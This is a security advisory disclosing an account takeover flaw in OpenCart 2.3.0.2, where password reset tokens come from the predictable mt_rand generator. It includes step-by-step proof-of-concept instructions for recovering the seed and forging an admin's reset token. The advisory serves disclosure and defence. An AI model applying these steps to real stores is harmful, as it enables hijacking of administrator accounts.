SSD Advisory – OpenCart Account Takeover

Credit to Author: Maor Schwartz| Date: Sun, 26 Mar 2017 13:14:58 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerability Summary
The following advisory describes a account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is a opensource e-commerce platform written in PHP.

“Opencart is an easy to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.”

Credit
An independent security researcher “Ayrx” has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor Responses
The vendor had this response to our report:
“… another clown acting like james bond with a nonsense Vulnerability”
“james already told me it was bullshit so go ahead!”

Vulnerability Details

OpenCart versions 2.1.0.0 up till the latest release of 2.3.0.2 contains a token() function that generates tokens using PHP’s mt_rand function:

PHP’s mt_rand function is based on the Mersenne Twister PRNG which is not cryptographically strong and easily exploitable.

In particular, the token() function is used in generating password reset tokens, which leads to an account takeover vulnerability.

Proof of Concept
The described proof of concept requires OpenCart running on a fresh PHP process. This is because PHP’s mt_rand is seeded once on process start.

The scripts used are in the Exploit Scripts section of the report.

Initial setup:

  1. Download OpenCart v2.3.0.2 from here
  2. Extract the files and rename config-dist.php and admin/config-dist.php to config.php and admin/config.php
  3. Run the following command “php -S 0.0.0.0:8000” from upload/ folder
  4. Continue the installation through the web interface (‘127.0.0.1:8000’ for example) – Follow the installation guide
  5. Register an account that belongs to the “attacker” – In this Proof of Concept we will use the email ‘foo@abc.com‘, and admin@abc.com belongs to the account you want to takeover

Attack:

  1. Download and compile php_mt_seed v3.2.
  2. Send a password reset request for the attacker controlled email account
  3. Send a password reset request for the account you want to takeover
  4. Find password reset token sent to foo@abc.com
  5. Run python Convert_token.py TOKEN.
  6. Run ./php_mt_seed with output of convert_token.py
  7. Edit the $seed variable in Generate.php with the seed discovered by php_mt_seed
  8. Run the following command “php Generate.php” to discover the password reset token of admin@abc.com
  9. Go to “localhost:8000/admin/index.php?route=common/reset&code=CODE” with CODE replaced by the output of Generate.php
  10. We have now taken over the admin account by resetting the password!

Once again, this Proof of Concept requires the password reset requests be processed by a fresh PHP process (or a PHP process that has not called mt_rand before)

Exploit Scripts

Convert_token.py

Generate.php

Untwister
When OpenCart has been running for some time, the token generated by it would need more than just one token to be deduced (allowing you to know the next token that is generated). To make life easier a tool called Untwister has been built. Using the Untwister an attacker can use multiple tokens he has recovered to predict the next tokens that will be generated by OpenCart.

More details on Untwister can be found here: https://www.bishopfox.com/blog/2014/08/untwisting-mersenne-twister-killed-prng/.

https://blogs.securiteam.com/index.php/feed